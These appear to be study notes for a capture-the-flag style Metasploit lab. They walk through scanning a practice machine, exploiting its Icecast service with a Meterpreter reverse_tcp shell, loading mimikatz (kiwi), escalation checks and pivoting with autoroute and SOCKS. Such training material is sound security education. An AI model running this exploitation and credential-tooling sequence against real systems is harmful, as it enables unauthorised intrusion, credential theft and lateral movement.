¶ Introduction
Metasploit, an open-source pentesting framework, is a powerful tool utilized by security engineers around the world. Maintained by Rapid 7, Metasploit is a collection of not only thoroughly tested exploits but also auxiliary and post-exploitation tools. Throughout this room, we will explore the basics of using this massive framework and a few of the modules it includes.
Here's a link to the companion video for this room in case you're stuck! Link
The virtual machine used in this room (Ice), a worksheet version of this room, and the subsequent answer key can be downloaded for offline usage from https://darkstar7471.com/resources.html
If this is your first time using Metasploit, you'll have just a few things to do before you utilize its full functionality. Let's go ahead and get everything started!
First things first, we need to initialize the database! Let's do that now with the command: msfdb init
Before starting Metasploit, we can view some of the advanced options we can trigger for starting the console. Check these out now by using the command: msfconsole -h
Once the database is initialized, go ahead and start Metasploit via the command: msfconsole
After Metasploit has started, let's go ahead and check that we've connected to the database. Do this now with the command: db_status
Let's go ahead and start exploring the help menu. On the Metasploit prompt (where we'll be at after we start Metasploit using msfconsole), type the command: help
Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. You can use the search commmand
We select the module with the use command. With the info command we get more details. Parameters are set with either set or globally with setg and unset with unset
Metasploit has a nc equivalent built in: connect
Screen is recorded with spool
You can save your progress with save
¶ Modules
Metasploit consists of six core modules that make up the bulk of the tools you will utilize within it. Let's take a quick look through the various modules, their purposes, and some of the commands associated with modules.
*Note, this diagram includes both the interfaces and *most* of the modules. This diagram does not include the 'Post' module.
- Exploit contains all known exploits available to Metasploit
- Payload contains the follow-up persistency
- Encoder contains the obfuscation modules that reduces antivirus detection
- NOP has the modules for buffer overflow and ROP attacks
- Auxiliary has the scanning and verification modules
- Post contains all pivoting and looting modules
It can be that modules are not loaded by default. You can then load them with the load command.
¶ Move that shell!
Remember that database we set up? In this step, we're going to take a look at what we can use it for and exploit our victim while we're at it!
As you might have noticed, up until this point we haven't touched nmap in this room, let alone perform much recon on our victim box. That'll all change now as we'll take a swing at using nmap within Metasploit. Go ahead and deploy the box now, it may have up to a three-minute delay for starting up our target vulnerable service.
*Note, Metasploit does support different types of port scans from within the auxiliary modules. Metasploit can also import other scans from nmap and Nessus just to name a few.
Metasploit comes with a built-in way to run nmap and feed it's results directly into our database. Let's run that now by using the command db_nmap -sV MACHINE_IP
Let's go ahead and see what information we have collected in the database. Try typing the command hosts into the msfconsole now.
How about something else from the database, try the command services now.
One last thing, try the command vulns now. This won't show much at the current moment, however, it's worth noting that Metasploit will keep track of discovered vulnerabilities. One of the many ways the database can be leveraged quickly and powerfully.
Now that we've scanned our victim system, let's try connecting to it with a Metasploit payload. First, we'll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type use followed by a unique string found within only the target exploit. For example, try this out now with the following command use icecast. We receive exploit/windows/http/icecast_header as a result.
While that use command with the unique string can be incredibly useful that's not quite the exploit we want here. Let's now run the command search multi/handler.
Go ahead and run the command use NUMBER_NEXT_TO exploit/multi/handler wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use.
Now type the command use NUMBER_FROM_PREVIOUS_QUESTION. This is the short way to use modules returned by search results.
Next, let's set the payload using this command set PAYLOAD windows/meterpreter/reverse_tcp. In this way, we can modify which payloads we want to use with our exploits. Additionally, let's run this command set LHOST YOUR_IP_ON_TRYHACKME. You might have to check your IP using the command ip addr, it will likely be your tun0 interface.
Let's go ahead and return to our previous exploit, run the command use icecast to select it again.
One last step before we can run our exploit. Run the command set RHOSTS MACHINE_IP to tell Metasploit which target to attack.
Once you're set those variables correctly, run the exploit now via either the command exploit or the command run -j to run this as a job.
Once we've started this, we can check all of the jobs running on the system by running the command jobs
After we've established our connection in the next task, we can list all of our sessions using the command sessions. Similarly, we can interact with a target session using the command sessions -i SESSION_NUMBER
Now that we've got a shell into our victim machine, let's take a look at several post-exploitation modules actions we can leverage!
First things first, our initial shell/process typically isn't very stable. Let's go ahead and attempt to move to a different process. First, let's list the processes using the command ps.
Let's go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won't work at the current time as we don't have sufficient privileges but we can still try! We can use the migrate command.
Well that migration didn't work, let's find out some more information about the system so we can try to elevate. The command is guid for the user and sysinfo for the system.
We can load modules as well. Let’s load mimikatz by load kiwi and run getprivs.
We can run Metasploit modules and upload files with use and upload.
Useful commands are
post/windows/gather/checkvm
run post/multi/recon/local_exploit_suggester
¶ Pivoting
Last but certainly not least, let's take a look at the autorouting options available to us in Metasploit. While our victim machine may not have multiple network interfaces (NICs), we'll walk through the motions of pivoting through our victim as if it did have access to extra networks.
Let's go ahead and run the command run autoroute -h, this will pull up the help menu for autoroute.
An example would be: run autoroute -s 172.18.1.0 -n 255.255.255.0
Also, SOCKS can be an option: use auxiliary/server/socks5
Once we've started a socks server we can modify our /etc/proxychains.conf file to include our new server.
¶ Blue, an example
Would have been smart to use a simple stageless version.
